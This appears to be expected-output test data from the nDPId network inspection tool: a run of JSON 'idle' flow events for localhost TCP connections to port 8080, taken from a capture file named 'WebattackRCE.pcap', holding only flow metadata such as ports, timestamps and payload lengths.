-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
